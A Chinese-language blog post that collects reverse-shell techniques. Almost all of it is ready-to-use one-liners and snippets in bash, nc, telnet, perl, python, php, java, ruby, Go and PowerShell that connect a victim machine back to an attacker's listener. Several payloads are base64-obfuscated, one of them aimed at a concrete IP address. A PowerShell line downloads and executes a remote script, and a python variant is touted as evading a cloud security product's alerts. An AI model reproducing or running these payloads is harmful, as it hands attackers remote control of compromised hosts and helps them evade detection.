反弹shell方式收集


0x00 攻击机 nc 监听

nc -nvlp 443

-n: 不反向解析 dns,即不通过 ip 解析域名 no dns
-v: 详细信息输出 verbose
-l: 监听 listen
-p: 指定端口 port

0x01 常用 Shell

1. Linux/Mac OS

查看全部 shell:cat /etc/shells

# sh
/bin/sh

# bash
/bin/bash
/usr/bin/bash

# rbash
/bin/rbash
/usr/bin/rbash

# dash
/bin/dash
/usr/bin/dash

# Other
/usr/bin/screen

2. Windows

cmd
powershell

# shell路径
C:/Windows/System32/cmd.exe
C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe

0x02 各种反弹方式

1. bash 反弹

bash -i >& /dev/tcp/AttackerIp/AttackerPort 0>&1

base64 版

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTUuMTU5LjQyLjI0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}'

2. nc 反弹

nc -e /bin/sh AttackerIp AttackerPort

-e: 指定 nc 连接成功后执行的程序

3. telnet 反弹(nc 不可用或/dev/tcp 不可用时)

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

4. perl 反弹

perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

不依赖于/bin/sh 的 shell: ***这条语句比上面的更为简短,而且确实不需要依赖/bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

5. python 反弹(云盾不报警)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

另外的形式:

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('attackerip',9000))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

另外 Metasploit 版的代码:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=attackerip LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

6. php 反弹

php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

7. java 反弹

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

8. ruby 反弹

ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

不依赖于/bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

如果目标系统运行 Windows:

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

9. Golang 反弹

package main

import (
    "bytes"
    "net"
    "os"
    "os/exec"
)

func main() {
    conn, err := net.Dial("tcp", "attackerip:443")
    if err != nil {
        os.Exit(1)
    }

    // 解决cmd中文乱码
    cn := exec.Command("cmd", "/C", "chcp 65001") // cmd/powershell
    var output bytes.Buffer
    cn.Stdout = &output
    cn.Run()

    // 反弹shell
    cmd := exec.Command("cmd") // cmd/powershell
    cmd.Stdin = conn
    cmd.Stdout = conn
    cmd.Stderr = conn
    cmd.Run()
}

10. powershell 反弹

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress attackerip -port 4444

11. 其它

exec 5<>/dev/tcp/attackerip/4444;cat <&5|while read line;do $line >&5 2>&1;done

文章作者: Truda
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Truda !
评论
  目录